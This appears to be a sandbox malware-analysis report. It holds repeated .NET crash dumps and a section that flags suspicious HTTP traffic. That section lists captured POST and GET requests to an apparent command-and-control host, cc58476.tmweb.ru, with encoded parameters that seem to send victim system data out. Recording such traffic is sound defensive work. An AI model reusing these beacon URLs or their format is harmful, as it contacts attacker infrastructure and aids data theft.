GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 5d 1e 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cecd4 registers.esp: 123002108 registers.edi: 123006572 registers.eax: 0 registers.ebp: 123006580 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58cf235 0x58c4186 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d0 1e 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cec61 registers.esp: 123006528 registers.edi: 123006592 registers.eax: 0 registers.ebp: 123006600 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58cf235 0x58c4186 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 5d 1e 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cecd4 registers.esp: 123002132 registers.edi: 123006592 registers.eax: 0 registers.ebp: 123006600 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x7594150 0x58c08ab 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d0 1e 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cec61 registers.esp: 107015528 registers.edi: 107015592 registers.eax: 0 registers.ebp: 107015600 registers.edx: 39284804 registers.ebx: 38596256 registers.esi: 38850708 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x7594150 0x58c08ab 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 5d 1e 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cecd4 registers.esp: 107011132 registers.edi: 107015592 registers.eax: 0 registers.ebp: 107015600 registers.edx: 39284804 registers.ebx: 38596256 registers.esi: 38850708 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x2cb060 @ 0x64e7b060 0x58c0ba3 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 89 b7 88 5d 89 85 10 ff ff ff 8b 85 10 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7595398 registers.esp: 107013988 registers.edi: 107014820 registers.eax: 0 registers.ebp: 107014832 registers.edx: 41956964 registers.ebx: 107015456 registers.esi: 38852812 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x2cb060 @ 0x64e7b060 0x58c0ba3 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 40 b4 88 5d 89 85 ac fe ff ff 8b 85 ac exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x75956e1 registers.esp: 107013988 registers.edi: 107014820 registers.eax: 0 registers.ebp: 107014832 registers.edx: 41957276 registers.ebx: 107015456 registers.esi: 38852812 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x2cb060 @ 0x64e7b060 0x58c0ba3 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 1e ae 88 5d 89 85 e4 fc ff ff 8b 85 e4 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7595d03 registers.esp: 107013988 registers.edi: 107014820 registers.eax: 0 registers.ebp: 107014832 registers.edx: 41957704 registers.ebx: 107015456 registers.esi: 38852812 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x2cb060 @ 0x64e7b060 0x58c0ba3 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 af ac 88 5d 89 85 c0 fc ff ff 8b 85 c0 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7595e72 registers.esp: 107013988 registers.edi: 107014820 registers.eax: 0 registers.ebp: 107014832 registers.edx: 41957860 registers.ebx: 107015456 registers.esi: 38852812 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ

Performs some HTTP requests (15 events)

request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&db8cb8b2da220b8926f1fade5e56f6b5=75bc25ebf5d91a1ca155cc8c30991951&WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&ea78c0a6210543c33537cc209e0e617c=a7774efef20b27a2439fae72fd64c0a2&3074739814e1bc1bd77f06eb291cb8b2=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=u4iL5J3b0NWZylGZgcmbp5mbhN2U&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&1527e96e778981f3166c4de9ee18b563=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&b9a703661957fd9398026d0825d1bb0e=wYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZ&395456b66fc45ba775af61ef30811cd1=QfiIXZnFmbh1EItFmcn9mcQJiOic3bk5WaXR1QBJCLiklI6Iibp1GZBNXaiwiIOJiOi0WYjJWZXNXaiwiIZJiOiUmbvhGcvJ3Yp10cpJCLiQFUJJ1QgcVROByUEFkI6IyRBRlIsICdpJEI0YDIOtEIsFmbvl2czVmZvJHUgcDIzd3bk5WaXJiOiIXZW5WaXJCL9JCa0VXYn5WazNXat9CXvlmLvZmbpBXavw1LcpzcwRHdoJiOiUWbkFWZyJCLiwWdvV2UvwVYpNXQiojIl52b6VWbpRnIsIiN4EzMwIiOiwWY0N3bwJCLi02bjVGblRFIhVmcvtEI2YzN0MVQiojInJ3biwiI0gzN54iNyEDLwYjN14yNzIiOiM2bsJCLiI1SiojI5JHduV3bjJCLiwWdvV2UiojIu9WanVmciwiIsV3blNlI6ISe0l2YiwiIwUTMuQzMx4COwIjL1cTMiojIwlmI7pjIvZmbJBXSiwiIyIDdzVGdiojIl1WYOJXZzVlIsIyQQ1iMyQ1UFRlI6ISZtFmTDBlIsICNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=gNwIGZyEWYhNGNyQzYkFjZkBzN1MjZjljMxITNkRmNhFjN5UWYhNjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=gLu4ycll2av92Ygcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=u4iLzRmcvd3czFGcgcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
